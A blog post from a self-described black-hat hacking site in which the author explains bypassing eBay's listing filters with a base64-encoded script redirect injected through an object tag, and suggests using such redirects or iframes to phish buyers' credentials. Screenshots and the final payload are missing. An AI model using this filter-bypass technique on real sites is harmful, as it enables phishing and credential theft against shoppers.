Hello... Go! Black Hat is another blog for Pure Black Hat Hacking Guides.

Bypassing e-bay XSS filters to redirect to any other page

+ 2 comments




in this mail they have mentioned that,

If there is any violation against the eBay policy, the listing will be removed and the user account will be suspended.

but i don’t believe so, because when i was testing this vulnerability this page was public since 3 days ,no account suspension nor even they removed listing. and as per my experience 3 days are more than enough to hacking someone! I really feel like there have not been any mechanism set up for moderating or checking the listing.

this XSS have not affected the cookie disclosure area, but still the page was able to redirect to another page without any warnings, and also can inject iframe inside my product listing

imagine if a hacker list any product and make customer redirect to his phising page, he can easily grab his credentials or if a hacker puts his phising page as iframe in product listing only he can easily grab credentials.
not wasting much of your time let me straightly tell you how do i exploited it..

First i have tried to inject normal javascript like -

<script>window.location="http://about.me/parv_jain";</script>

they i got an error like this -



ok lets make it bit complicated for ebay filters and make it bit more complicated,

let’s encode <script>window.location="http://about.me/parv_jain";</script> with base64

and then it will look like..
PHNjcmlwdD53aW5kb3cubG9jYXRpb249Imh0dHA6Ly9hYm91dC5tZS9wYXJ2X2phaW4iOzwvc2NyaXB0Pg== cool! 

lets now inject this exploit using <object> tag. and we will get something like this..


nice, now lets  try to put this small script..


volla! filter can’t understand the encoded code as a result it bypasses and list the item! :)

and script actually run successfully! hence redirect to the page which i have specified!


at last, video i have screen-casted!

2 comments: